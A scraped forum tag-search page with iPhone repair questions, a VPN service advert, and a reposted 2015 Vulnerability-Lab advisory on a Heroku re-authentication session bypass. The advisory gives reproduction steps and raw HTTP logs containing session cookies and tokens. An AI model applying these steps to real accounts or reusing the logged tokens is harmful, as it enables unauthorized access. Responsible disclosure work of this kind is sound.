Jump to content

Search the Community

Showing results for tags 'service'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Un prieten de-al nostru "PH4N70114" mi-a dat un pm foarte interesant cu o problema pe Iphone 5s. Mi s-a spus ca pe displayul "LCDul" apar dungi albastre cand il porneste, in iTunes cu erroarea 9 gen: 1. Problema prietenului nostru este din placa de baza, este fisurata, s-a bagat surubul gresit, dupa cate ati observat, in placa de baza, se afla SURUBURI MICI SI MARI!!!! 2. Cateodata probleme de genul, da, cu posibilitati foarte mici sa fie din LCD, de asta, trebuie testat si LCDul poate sa fie magnetizat!!! Dungile la magnetizare, dispar intr-o saptamana singure! 3. Daca aveti alte probleme hardware sau software, va astept cu intrebarile aici! O zi buna!
  2. Hello, Romania Security Team ! The Company In-Disguise . Com - Anonymous Internet Surfing, Anonymous File Sharing Torrent-P2P, Amonymous WiFI. Fully Automatic and Anonymous VPN Service NO Logs , You don?t have to waste time on: 1 - Search Supports if disconnected from a server, search for a standard installation OpenVPN client spend time for installing downloaded configs to the program. Troubleshoot the upgraded system for a stable connection to the VPN. Access to all servers for just 9 EURO. DoubleVPN, OPENVPN and PPTP / L2TP / IpSec VPN - Access to 40 Servers in 29 Countries! Subscribe to All Servers of Our Service for 9 Euro Month; 3 months = 20 Euro; 6 months = 35 Euro; 1 year = 55 Euro. 2 - Unique VPN Client is easy to install on All Kinds of Operating Systems: MAC / Windows / Linux / Android !!! Will allow you to switch easily between the VPN servers in USA / CA / DE / UK / IT / SP / NL / LU / EG / PA / RO / MY Continuing In the near future our service will be available in Spain, Greece, Sweden, Mexico, Czech Republic, Poland, China, Belgium ... Types of VPN connections included in a single subscription - DoubleVPN and OpenVPN. The Speed Of All Our Servers OpenVPN = 1000 M.Bit / Unlimited Traffic !!! 3 - The program features an easy configuration of a VPN connection to your Internet: - Automatically Block Internet Connection when Disconnected from a VPN. - Automatic connection to the VPN when you turn on the Internet. 4 - Also, our Service has a unique N-tier, Partnership Program: You will get 30% of total payments of your customers! 5 - Company Takes All Kinds Of Payments in Full Auto Mode! WebMoney / Visa / Master Card / PayPal / Perfect Money / BitCoin / SMS and many others. Our Anonymous VPN Service Is Here! in-disguise . com Disguise Your Internet Connect! If You Have Question - Please Contact: ICQ: 6850058 Jabber: In-Disguise-VPN@jabber.org E-mail: manager@in-disguise.com Skype: In-Disguise-VPN Sincerely, Your Anonymous VPN Service : In-Disguise . Com ================================================== Dear Administration, I give You Free VPN, in All time, If You Don't to Delete My Post - Contact Me Please. ----- Dear Users Community, We Giving All Users This Community, Test VPN Access, If You Reply How Work our VPN Service.
  3. Salut rst! Am un iPhone 5, cu o problema la camera dintr-o data camera de pe spate nu a mai funcționat, adică când intru sa fac o fotografie se blochează când selectez camera de pe spate iar când trec la celălalta își revine. Am decis sa i-l desfac si când l-am pornit a fiunctionat câteva secunde apoi iarăși a revenit la problema anterioară. Si după ce i-l asamblez constat cu stupoare ca difuzorul de sus (casca se aude foarte încet). Daca ma poate ajuta cineva cu niște sfaturi a-și fi recunoscător . Multumesc!
  4. Document Title: =============== Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1323 Video: http://www.vulnerability-lab.com/get_content.php?id=1336 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/06/09/heroku-bug-bounty-2015-api-re-auth-session-token-bypass-vulnerability Release Date: ============= 2015-06-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1323 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity. Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. (Copy of the Vendor Homepage: https://www.heroku.com/home ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application. Vulnerability Disclosure Timeline: ================================== 2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program) 2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program) 2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team) 2015-06-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Heroku Product: Heroku Dashboard - Web Application (API) 2014 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service. The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module. The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication. The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main heroku web-service the user will be forced to login again. During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running. If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the security mechanism to add or request the database name. The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized access after a session has been expired during the usage of the heroku service. The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation of the vulnerability results in the evade and bypass of the re-authentication mechanism. Proof of Concept (PoC): ======================= The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the re-auth bypass vulnerability ... 1. Register a webpage account at the official heroku website 2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired 3. When the session is expired to do not press the re-auth function button that popup stable to all service 4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization 5. Successful reproduce of the session vulnerability! Video Demonstration The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases. The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself. Exception Message: -Your session has expired --Your current session has expired or become inactive and has been terminated. ---Please log in again to continue using Dashboard. --- PoC Session Logs --- 17:55:32.218[718ms][total 718ms] Status: 303[See Other] GET https://id.heroku.com/logout Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://www.heroku.com/home] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=sqPL2wMwiUxRKRDIZRZpFZtpQVHNL051XZMscTdZzo85hsFiMzwNrL-ZgLLCf8llJTtLTk8ilInCKAeHek3hJ971JEcCHKfGmen-xMGjed0pjaT5KG1CKDBB-oPo5z_trM8eSSBDiLUnva-T9N6Pty3jwbNpxFYeHFG79jB1K1j-lc_-dB8tACasWzQbFPc5d-6ampRWbPJf4ZQhglDefQdPrvLEqwO5BD5uXKzT2WKvilkEqdnzzbUKXm3WD1GMWZwqsV6hkeUJMn5vbsVb32yIm1r7sWL5WxuYMvbTpEdMWcA5mDJzoc0ME_Oo0F4Sz3lhIxBhipySHAYlAiR6B7SQCocJGSCqIJckDiQ_cZ5wY8s2hmGAvL2YKGb4gZGLMR2VvJDC8AEOhbS5ofhZDrYTvEaRCFgqweI3KGFQlcie7C2AQnYFgo7UfnilQsLZEVKAZnJ_f6wy3t9a108LwzUxg5aQ27mYexe5IK3Ei2ji5BNFcphWiujvrHG4TjtQwtxfF6eZZhTurqM1Rcwle2hPfQqQlSMrEf54dh_nurL6Oyh3mMHi68mhDZm6zIaAq-GCGpx8PwNhwZ8Wp1ZjmD04fFsPKBZBA9pJ2IMuP5NBgP6dpkPuPa1MxIlDpPuz6PuK_ONBKPI-ApKey2g6_6r6dHXBZU-dBMAX9nNm16r7rEoJR4StN3ApBazWVxHDTMJdprFoMbcAYsUEsjFQBMuNMwe3GKxvFKNynwK-GWsjCxL_BMe8pZQVaW7h-qSZWydA4Pmx9VmkTdEZ7e4BXiGXZCUo6et8QyZLK4SfV4tod03s6MkB3nbWjSLEsJyo4KQSDu4jJyqP7g9nvRuJz67XHl_pTLcV2updPygb3qrlyeFZLhuXtjsDbpWHMxWjvjhX7g63QkdsCSsytKBOYNsKZu8npvW59b3U6jO-aB-ZN4hMDbogRSKRhRE1bIrN%7CbHVM61lFujhv41-3Kbdezg%3D%3D%7C90aed411ab431962695b4954963c46d29c694c5b89ee793a1654e400d0830070; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; heroku_session=1; heroku_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:55:42 GMT] Connection[keep-alive] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure] Location[https://id.heroku.com/login] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[17eefe38-a226-46fc-8e1d-2f673d87db10] Transfer-Encoding[chunked] Via[1.1 vegur] 17:55:32.937[159ms][total 818ms] Status: 200[OK] GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://www.heroku.com/home] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:55:42 GMT] Connection[keep-alive] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure rack.session=HSkfR06GR1NnxhFxsmBIy0sVnJareQJv2qjGRfPXqF3Dxw-NQDVWTkf5IxbkOvB9Z8WGGhGe2f4_P7ZkiWLRnuY_mYbgteaZNCrRtb13u0v7TCQN96dgWRfbP5lSlsLzJ3A_QBzFn0LtDWiUwv1GIPgmrGvMMRRNm6k7YRgVDF1VUVKLyo4eJ57fFw6kQG6_QeSZXL2pYCnvRe779I47DXgY-VrPXUbI5Uk9Cznr49pEvkkRfb3QatvMR8el3E8QT6StkYQQEDwzL2ZYJroQXhHPMa-yHcGVoNATooiumbPXBEOM1a-fKUdJ7s56yZ9l93Ie4fVxLOUtRRtjJd-O7Sg3FLqdiNM7siMYpSD_gxh_XT3hWYbd4h5t9Xoj_zgOtxiDJlM63RchlyCtoFERag%3D%3D%7CFvfX9eXB36GDcprUj47Nrg%3D%3D%7C3212ecd5bcd6a88fd376d7bd6a58dda06d5de2e01f9b066d2dce3e441b8d09b2; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[6c5a1418-f70d-4eb5-901c-8b333e82d2e3] Transfer-Encoding[chunked] Via[1.1 vegur] 17:56:11.833[437ms][total 437ms] Status: 302[Found] GET https://postgres.heroku.com/databases Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[postgres.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBG--16c1365df04da320c8f856f41afe6b154b068da3; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Connection[close] Date[Sat, 20 Sep 2014 15:56:22 GMT] status[302 Found] Strict-Transport-Security[max-age=99; includeSubdomains] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1] Location[https://postgres.heroku.com/login] Content-Type[text/html; charset=utf-8] x-ua-compatible[IE=Edge,chrome=1] Cache-Control[no-cache, private] Set-Cookie[_session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; path=/; secure; HttpOnly] x-request-id[3757ef00-dcc8-44e7-9413-c3d1beab8f0d] x-runtime[0.008472] x-rack-cache[miss] Via[1.1 vegur] 17:56:12.273[183ms][total 183ms] Status: 302[Found] GET https://postgres.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[postgres.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Connection[close] Date[Sat, 20 Sep 2014 15:56:22 GMT] status[302 Found] Strict-Transport-Security[max-age=99; includeSubdomains] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1] Location[https://postgres.heroku.com/auth/heroku] Content-Type[text/html; charset=utf-8] x-ua-compatible[IE=Edge,chrome=1] Cache-Control[no-cache, private] Set-Cookie[user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure super_user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure postgres_session_nonce=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure] x-request-id[aab5515c-db99-4516-afb9-f81c6d7427e3] x-runtime[0.005907] x-rack-cache[miss] Via[1.1 vegur] 17:56:13.046[161ms][total 897ms] Status: 200[OK] GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=Oj3BV4aM5iZSvASRXbZL38nzvzIIh2T_S6vdquNUi-OZ6JARZBmQ2zTzwbXj9r1M5TY2tCgCUDV6CmJzJm06aX0EH6gr2QJTjzVd64_n-FlnBUmFFLaDc_gtbPTYX3K8SsDCHAVVhA75xb6j6bvFqlPk-Ne-848PcKFchgdKGSflzC8_-Wfqqg9hppwmjdb6ia9bKqejpkXY49b0ehF8FxQp8s7etE4YxhHhvIzJqxUd3oxBjZo_F2Zoec30Cc6dRuPk5J8bocsC8_8Zq09DoZFqN_DOG41HDlbKIW1TKUtFLfCvuQ3KoE7cjM7dSdVzZZf7uehizmAGWkBPIWp-fJRoUG3L2Rpoo0VZdN_ih-BGCtGMNiFb3K4586XR9yQWMuEiikHz1yhZp_fK7oZk60Ps3vTnNi1zGxRcfW_N3ScLeVLSyHMqefqlqtVMAWqTf5qP5pbBhbPiwJKTnowmmNPx92DrmkqWD0SrdKHOVtcWrCvwmNW5dzG7zAFQ_BMFAU-1c7BDbIkTSBEI0YuSu48HuLkTAjNPJBuSLXJkj42h1MPsx3Vxz8HakjQxIJt1KirqkcQdZTlPheoKI0iYpi4V27TRMZtrb8AZh9mMtEo435snF2SDhMHSdzniCMlA7G-Ngw4EheMslTp5BsqmhIQiy0-hklsUKnMX8Hedh3g%3D%7CwHQzLOXMlHCSl_paZ8IydQ%3D%3D%7Cc627cc2ac2f61b0720781b7b15c81836840a4546ae4365f68d3c89ffd9d513d5; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:56:22 GMT] Connection[keep-alive] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure 